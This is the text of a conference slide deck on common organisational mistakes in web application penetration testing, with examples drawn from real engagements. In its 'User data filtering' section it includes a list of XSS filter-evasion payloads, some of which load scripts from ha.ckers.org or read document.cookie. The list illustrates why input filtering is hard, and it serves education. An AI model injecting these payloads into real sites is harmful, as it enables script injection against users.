Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
  3. Information Security

Marek Zmysłowski

advertisement 
Penetration Testing
7 Deadly Sins
MAREK ZMYSŁOWSKI
Penetration Testing – 7 Deadly Sins
Marek Zmysłowski
Presented by:
DISCLAIMER
This presentation expresses my private
opinions.
whoami
• Application Security Consultant
• OWASP Poland Chapter Board Member
• Penetration Tester with 6 years experience
VULNERABILITY ASSESSMENT
Vulnerability assessment is the process of
identifying and quantifying vulnerabilities
within a system.
PENETRATION TEST
Penetration testing is the method of evaluating
the security of a computer system or network
by simulating an attack from malicious
outsiders and malicious insiders. The process
involves an active analysis of the system for
any potential vulnerabilities. This analysis is
carried out from the position of a potential
attacker and can involve active exploitation of
security vulnerabilities.
PENETRATION TESTING VS. VULNERABILITY
ASSESSMENT
Penetration testing is the method of evaluating the security of a computer system or network by
simulating an attack from malicious outsiders and malicious insiders. The process involves an
active analysis
of the system for any potential vulnerabilities.
This analysis is carried out from the position of a potential attacker and can involve
active exploitation
of security vulnerabilities.
PENETRATION TEST – THE WHOLE TRUTH
If you fail a penetration test you know you
have a very bad problem indeed. If you pass
a penetration test you do not know that you
don’t have a very bad problem.
Gary McGraw
ACTORS
The project manager / risk analyst – the person that is
responsible from the client side for the pentest.
The pentester – very skilled security
guy.
The programmer /developer – person or
group of people that are responsible for
providing fixes for the application
PENETRATION TESTING PROCESS
The project manager requests a pentest. He is
responsible for providing all the information to
the pentester.
PENETRATION TESTING PROCESS
The pentester provides the pentest report.
PENETRATION TESTING PROCESS
The project manager sends the appropriate
report to the programmers so that they can
implement appropriate fixes.
PENETRATION TESTING PROCESS
The programmers provide fixes (hopefully)
PENETRATION TESTING PROCESS
The project manager requests a retest.
PENETRATION TESTING PROCESS
The pentester confirms that all vulnerabilities
have been fixed ;)
PENETRATION TESTING PROCESS
• Presented scenario is almost utopia.
• In every stage of this process someone
can commit a sin.
SINNERS
Project manager / Risk Analyst
Programmer / Developer
PROJECT MANAGER / RISK ANALYST
• Manages the whole project
• They order penetration tests (mainly
because of formal reasons)
• They want the pentest to be ASAP and
without any findings 
PROGRAMMERS / DEVELOPERS
• They implement patches for the
vulnerabilities
• Their knowledge about security is not very
wide
I I
CAREFUL
– IT’S OUR
Be careful – It BE
is our
production
system
PRODUCTION SYSTEM
© 2012
BE CAREFUL – IT’S OUR PRODUCTION SYSTEM
Inappropriate environment
Scanners restrictions
User input restriction
INAPPROPRIATE ENVIRONMENT
• Only an appropriate environment would
allow for an effective penetration test
• There are three types of environments:
– DEV/UAT
– PrePROD
– PROD
INAPPROPRIATE ENVIRONMENT – DEV/UAT
•
•
•
•
•
Sometimes not fully functional
Sometimes not fully patched
Sometimes not filled with appropriate data
Sometimes to much is going on with the code
Even the smallest change (fix) in the code
can create new vulnerabilities
INAPPROPRIATE ENVIRONMENT – PrePROD
• The code of the application is the same as
production environment code.
• The application is filled with data that are
real or very close to real
• Automation tests can be performed
INAPPROPRIATE ENVIRONMENT – PROD
• Sometimes modifications are not allowed
• Sometimes using some functionality is not
allowed
• Sometimes it is not possible to perform
automated tests
SCANNERS RESTRICTIONS
• Usually the pentester is not allowed to use
scanners or any automated tools because:
– They send too many requests
– They create a huge amount of uncontrolled data
that can destroy the application
• Lack of scanners can lower the value of
the test and hinder the discovery of some
vulnerabilities.
SCANNERS RESTRICTIONS – EXAMPLE
• The application stopped working right after
the web scanner was used
• The config analysis revealed that only 16
connections can be made to the database
• The manager’s explanation was – This
restriction exists because only a few people
use this application
• An attacker doesn’t care about these
restrictions. He uses the simplest of ways to
break, crack or destroy the targeted
application
USER DATA RESTRICTIONS
Sometimes the manager creates a
restriction on the user input data. He does
not want to interfere with the normal
application processes.
• Such restrictions disrupts proper execution
of the test
• Such restrictions do not apply to the real
attacker 
USER DATA RESTRICTIONS
• The penetration test referred to the
production application that was used by
normal users
• The restriction did not allow the testing of
Stored XSS vulnerabilities.
• When the data was inserted to test
Reflected XSS vulnerabilities, they
accidently caused creation of Stored XSS.
II II
NESSUS
IS BETTER
My NessusMY
is better
than
yours THAN
YOURS
© 2012
MY NESSUS IS BETTER THAN YOURS
• Very often the scanning is treated the
same as the penetration test
• There is no best scanner with the button
„Hack the application”
• Scanners are treated only as
SUPPORTING tools during penetration
tests
MY NESSUS IS BETTER THAN YOURS
Web Inspect
w3af
Acunetix
Nessus
skipfish
Netsparker
App Scan
Burp Scanner
Nikto/Wikto
Nmap
MY NESSUS IS BETTER THAN YOURS
MY NESSUS IS BETTER THAN YOURS
MY NESSUS IS BETTER THAN YOURS - EXAMPLE
During the application test I received the
following results (the Accunetix scanner was
used):
– 243 confirmed XSS
– 97 XSS
– 99 page report
MY NESSUS IS BETTER THAN YOURS - EXAMPLE
Results
The vulnerability only exited on one page
(the error page) and only one parameter
was vulnerable (the parameter related to the
input string).
MY NESSUS IS BETTER THAN YOURS
Tools do not make software secure! They
help scale the process and help enforce
policy.
Michael Howard
III III
YOU HAVE–AIMOMENT
Do you haveDO
a moment?
need a - I
pentest
NEED
A PENTEST
© 2012
DO YOU HAVE A MOMENT? – I NEED A PENTEST
• Time is the biggest restriction
• The pentester knows how much time he
needs to perform a reliable penetration
test
• Do not reduce the time that is required for
the penetration test
• Remember – an attacker has an unlimited
amount of time 
DO YOU HAVE A MOMENT? – I NEED A PENTEST –
EXAMPLE
Microsoft Security Bulletin MS12-020 - Critical
Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
(2671387)
Published: Tuesday, March 13, 2012 | Updated: Tuesday, July 31, 2012
Version: 2.1
http://technet.microsoft.com/en-us/security/bulletin/ms12-020
IV IV
YOUuse
CANaUSE
RED
You can only
red ONLY
crayon
CRAYON
© 2012
YOU CAN ONLY USE A RED CRAYON
Inappropriate scope
Skipping some functionalities
Lack of application data
INAPPROPRIATE SCOPE OF THE SYSTEM
• If the application is a part of the system,
the whole system should be in scope for
the penetration test.
• Some vulnerabilities can be injected
through one system and executed by
another system
INAPPROPRIATE SCOPE OF THE SYSTEM - EXAMPLE
Web Services
Web Application
The web services
read the data and
encoded it before
was sent to the
user.
The web
application wrote
the encoded data
to database.
Database
INAPPROPRIATE SCOPE OF THE SYSTEM - EXAMPLE
Web Services
The web services
didn't care about
the data that was
written to the
database because
they encoded it
before sending it to
the user.
Web Application
Stored XSS
Database
The web
application
assumed that the
data from the
database was
encoded.
SKIPPING SOME FUNCTIONALITY
• Sometimes some parts of the application
are removed from the scope
• The security of this part is treated as a
separate problem – which is wrong. Not
only is the security of the concept
important but also the security of the
particular implementation
SKIPPING SOME FUNCTIONALITY - EXAMPLE
Skipping the login mechanism
The access control's session management
can be of critical importance to some
resources. Even if the solution that will be
implement later is safe, the implementation
can be unsecure.
LACK OF APPLICATION DATA
• The lack of data is not so important when
the application is relatively small
• In case of a big application, the lack of
data can be very difficult for the pentester
– he needs much more time to fill the
application with data
LACK OF APPLICATION DATA - EXAMPLE
Good example can
be the Polish bank
system DEF 3000.
Without data, it
cannot be
practically tested –
it is very hard to
insert data.
V V
CANSkywalker?
I BE LUKE SKYWALKER?
Can I be Luke
Nooo
NOOO
© 2012
CAN I BE LUKE SKYWALKER? NOOO
• During the penetration test it is important for
the pentester to have access to an
appropriate number of accounts. The
pentester needs to have access to two
accounts for EACH role:
– The different roles – testing vertical privilege
escalation
– The same roles – testing horizontal privilege
escalation
– The different roles can have access to different parts
of the application. Lack of these accounts can cause
that some parts of the application will not be tested
CAN I BE LUKE SKYWALKER? NOOO
• The application had two types of accounts
– regular user and administrator
• At the beginning, the pentester had access
only to a normal user account
• After a long period of time and many
attempts the pentester received access to
an administrator account
CAN I BE LUKE SKYWALKER? NOOO
Final Result
There was a vulnerability in the
administration’s access control panel. The
page with this panel has a special link which
contains random data. Any user could
perform administrative tasks if he knows the
link. The access control was based on the
random link – security by obfuscation 
VI
VI
Let’s do it together
LET”S DO IT TOGETHER
© 2012
LET’S DO IT TOGETHER
Different tests made parallel
Patching the environment during the pentest
DIFFERENT TESTS MADE PARALLEL
Doing different tests parallel
can disrupt the results of the
penetration test. Even in the
simplest cases like inserting
user data can interfere with
the system’s state. Based
on this state the pentester
evaluates if the attack was
successful or not.
PATCHING THE ENVIRONMENT DURING THE PENTEST
Do not create patches
during the test because:
• It disrupts the results –
the previous scenarios
can be outdated
• The simplest patch can
create new
vulnerabilities which
can be more serious
VII
VII
Postproduction
POSTPRODUCTION
© 2012
POSTPRODUCTION
User data filtering
My application is not Internet facing
Prove it!
USER DATA FILTERING
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav
<IMG SRC=JaVaScRiPt:alert('XSS')>
¼script¾alert(¢XSS¢)¼/script¾
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
ascript:alert('XSS');">
<input onfocus=write(1) autofocus>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav	ascript:alert('XSS');">
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<BGSOUND SRC="javascript:alert('XSS');">
<DIV STYLE="width: expression(alert('XSS'));">
<iframe/src \/\/onload = prompt(1)
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
<IMG
SRC=javascript:a&#
<BODY ONLOAD=alert('XSS')>
108;ert('XSS')>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG onmouseover="alert('xxs')"> <iframe src=http://ha.ckers.org/scriptlet.html <
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
USER DATA FILTERING
Around 90% XSS attacks can be stopped by
escaping or filtering the following characters:
“ ‘ <>
The rest of the XSS attacks are related to
UTF encoding in the MSSQL database and
direct injection to the JavaScript code
MY APPLICATION IS NOT INTERNET FACING
Phishing
Pharming
Whaling
MY APPLICATION IS NOT INTERNET FACING EXAMPLE
In April 2011 the RSA company was attacked.
Attackers used an email with a malicious XSLT file.
This file was sent in a simple email directly to a
specific group of people. These people had access
to the servers that were not Internet facing. That
way, the data was stolen from the server :D
PROVE IT!
If other specialists do not
prove their findings, why
is a pentester required to
do this?
How to mitigate this?
HOW TO MITIGATE THIS?
© 2012
HOW TO MITIGATE THIS?
• There is only one way – education
• There are many resources available on
the Internet – www.owasp.org
OWASP APPLICATION SECURITY VERIFICATION
STANDARD PROJECT
• The OWASP Application Security Verification Standard (ASVS)
Project provides a basis for testing web application technical
security controls.
• The primary aim of the OWASP Application Security Verification
Standard (ASVS) Project is to normalize the range in the coverage
and level of rigor available in the market when it comes to
performing Web application security verification using a
commercially-workable open standard. The standard provides a
basis for testing application technical security controls, as well as
any technical security controls in the environment, that are relied on
to protect against vulnerabilities
OWASP TESTING GUIDE v4
The OWASP Testing Guide includes a "best
practice" penetration testing framework
which users can implement in their own
organizations and a "low level" penetration
testing guide that describes techniques for
testing most common web application and
web service security issues.
And many, many more
Q&A?
Q&A
© 2012
THANK YOU
Related documents
presentation - Institute for Security Technology Studies (ISTS)
presentation - Institute for Security Technology Studies (ISTS)
Powerpoint Slides
Powerpoint Slides
Damn Vulnerable web application
Damn Vulnerable web application
Using HTML5 To Make JavaScript (Mostly)
Using HTML5 To Make JavaScript (Mostly)
Defending against We..
Defending against We..
File
File
Introduction to Computer Security
Introduction to Computer Security
Intro to Web App Security
Intro to Web App Security
OWASPAU08_Session_7_Mosse
OWASPAU08_Session_7_Mosse
XSS
XSS
Download
advertisement